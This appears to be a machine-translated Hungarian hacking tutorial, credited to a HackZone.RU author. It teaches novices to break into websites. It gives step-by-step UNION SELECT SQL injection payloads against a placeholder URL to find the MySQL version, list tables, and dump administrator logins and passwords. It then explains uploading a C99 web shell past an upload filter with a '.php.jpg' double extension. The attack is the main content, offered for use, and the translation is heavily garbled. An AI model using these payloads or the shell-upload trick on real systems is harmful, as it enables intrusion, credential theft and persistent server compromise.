Hacking weboldal segítségével sql-befecskendezés és kitölti a kagyló a fogadó

Oldal hacker SQL Injection-, és kitölti a kagyló a gazda.

Jó napot, uraim. Így elhatároztam, hogy írok egy cikket az azonos elégedett elterjedt a SQL támadás ideje - Injekció és kitölti a kagyló (héj) a feltört oldalon. Az ilyen cikkek, persze sok, de még egy, azt hiszem, nem árt, nem világos, hogy lesz legalább egy kicsit világosabb van.

célt. us / lol. php. id = 5 + érdekében + által +12 - Nincs hiba, akkor a mezők, vagy több, mint 12, vagy 12. cél. us / lol. php. id = 20 - a hiba. Ezért mezők kevesebb, mint 20. És így, amíg el nem érjük el eredményt. Keresztül unió válassza fog kinézni: cél. us / lol. php. id = -5 + unió + válassza + 1,2,3,4,5,6,7,8,9,10,11,12 / * stb Hogy ellenőrizze a MySQL verzió. ami telepítve van a szerveren, futtasson egy lekérdezést: cél. us / lol. php. id = -5 + unió + válassza +1,2,3, VÁLTOZAT (), 5,6,7,8,9,10,11,12 / * (is ismert és mzhno felhasználót parancs USER ()) és a böngésző közvetlenül a weblapon változata a dömpingelt adatbázisban. A legfontosabb dolog, hogy nézd az 5. vagy 4.. Mivel az 5. van jelen INFORMÁCIÓ _ _ SÉMÁJA táblákat. könnyebb lesz, hogy vegye fel.

Most megtudjuk a nevét táblaneveket. Ha a változat a 4. adatbázist, a nevek fogják kitalálni, hogy a lekérdezés típusát célt. us / lol. php. id = -5 + unió + válassza +1,2,3, admin, 5,6,7,8,9,10,11,12 + -tól + Felhasználók / * (Users lehetséges az adatbázis nevét), ha kitalálta a nevét és az étkezési (Users) kap egy következtetés a nevét a böngésző, és így léptetjük, amíg nem kap az eredmény. Ha ugyanaz a verzió a „izom» (MySQL) 5., lesz könnyebb, készítsen egy kérés típusa: cél. us / lol. php. id = -5 + unió + válassza +1,2,3, asztal _ nevét, 5,6,7,8,9,10,11,12 + -tól + INFORMATION_SCHEMA.TABLES / * és látja a nevét a böngészőben használ . Tegyük fel, hogy a tábla nevét admin, és szükségünk van egy olyan oszlopot, jelszavak (jelszavak). Része a kérelmet. célt. us / lol. php. id = -5 + unió + válassza +1,2,3, jelszavak, 5,6,7,8,9,10,11,12 + -tól + admin /*.Tochno is kiválasztott és bejelentkezési, lehet, hogy több szép így a cél parancsot. us / lol. php. id = -5 + Unió + válassza +1,2,3, concat_ws (0 x 3 a. jelszavakat, 0 x 3 a. bejelentkezést), 5,6,7,8,9,10,11,12 + a + admin / *. Szerezze be a kimeneti típusú bejelentkezés, jelszó (például admin, qwerty). A különböző esetekben eltérő lehet, ezért van egy kicsit elgondolkodott. Ha megkapjuk a hash (hash) a jelszó - akkor megy Brutus, ha egy jelszót következtetést -, hogy örül. Tehát, felhasználónév / jelszó kaptunk bejelentkezett a rendszerbe. Nos, mi a jogokat a rendszergazda, jól, így nem akarom, hogy érdekes és Servais séta. De ez le a shell, mint például a C 99 madshell. bizonnyal ez lesz a kiterjesztése txt. így a változás a php. Felöntjük a szerver lehet, például, vagy valamilyen formában a teljes feltöltés (feltölteni a), amelyen keresztül az adminisztrátorok, hogy minden kitöltés (pl képek). De ez azért történik, hogy van egy szűrő, azaz egy php fájlt ráöntjük is, nem tudjuk. Akkor megyünk a trükk, ezt c 99 madshell. php. jpg ilyen szűrő lehet kihagyni, ha kimaradt - minden szuper! Menj a böngésző itt megcélozni. us / c 99 madshell. php. jpg és örüljetek, hogy van egy héj van töltve, tud járni a szervita! Ha a UNIX-szerver. jó lenne többet tudni, és néhány az ő csapata.

Ez minden, uraim vonat újoncok! Sok szerencsét a nehéz törekvések!

A jövőben talán írok egy pár cikkeket a támadások más adatbázisok, például MSSQL.

Dementor különleges HackZone.RU